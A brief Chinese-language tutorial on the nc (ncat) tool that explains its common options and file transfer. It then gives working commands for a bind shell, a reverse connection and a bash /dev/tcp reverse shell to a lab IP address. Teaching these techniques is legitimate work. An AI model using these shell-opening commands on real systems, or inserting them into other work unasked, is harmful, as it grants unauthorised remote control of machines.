nc命令选项:
centos中的nc命令是ncat的软连接,与kali中的nc命令略有差别,下面是ncat的常用选项:
~]# nc -h
Ncat 7.50 ( https://nmap.org/ncat )
Usage: ncat [options] [hostname] [port]
# 仅使用unix套接字连接、扫描,通常是连接、扫描本机服务时使用
-U, --unixsock Use Unix domain sockets only
# 执行提供的命令
-c, --sh-exec <command> Executes the given command via /bin/sh
# 执行提供的命令
-e, --exec <command> Executes the given command
--lua-exec <filename> Executes the given Lua script
# 最大连接数
-m, --max-conns <n> Maximum <n> simultaneous connections
# 延迟时间
-d, --delay <time> Wait between read/writes
# 闲置时间,通常用于扫描结束后多久断开连接
-i, --idle-timeout <time> Idle read/write timeout
# 监听模式,设置监听端口
-l, --listen Bind and listen for incoming connections
# 不进行dns解析
-n, --nodns Do not resolve hostnames via DNS
# 使用udp协议
-u, --udp Use UDP instead of default TCP
--sctp Use SCTP instead of default TCP
-v, --verbose Set verbosity level (can be used several times)
文件传输
# 接收方提前设置监听端口与要接收的文件名(文件名可自定义):
nc -lp 8888 > node.tar.gz
# 传输方发文件:
nc -nv 192.168.75.121 8888 < node_exporter-1.3.1.linux-amd64.tar.gz
注意:192.168.75.121是接收方的ip地址。# 如果希望文件传输结束后自动退出,可以使用下面的命令:
nc -lp 8888 > node.tar.gz
nc -nv 192.168.75.121 8888 -i 1 < node_exporter-1.3.1.linux-amd64.tar.gz
注意:-i 表示闲置超时时间远程控制
# 正向控制,被控端主动设置监听端口及bash环境,控制端连接,如果有防火墙,需开放端口,否则会被拦截。
# 被控制端执行下面的命令:
nc -lvnp 8888 -c bash
# 控制端执行下面的命令:
nc 192.168.75.121 8888# 反向控制,控制端设置监听端口,被控端主动连接控制端的ip及端口,并提供bash环境。
# 控制端执行下面的命令:
nc -lvnp 8888
# 被控制端执行下面的命令:
nc 192.168.75.121 8888 -c bash反弹shell
# 控制端执行下面的命令:
nc -lvnp 8888
# 被控端执行下面的命令:
bash -i &> /dev/tcp/192.168.75.121/8888 0>&1对了,你们一直想要的Linux命令大全查询网站已经上线了,欢迎使用。
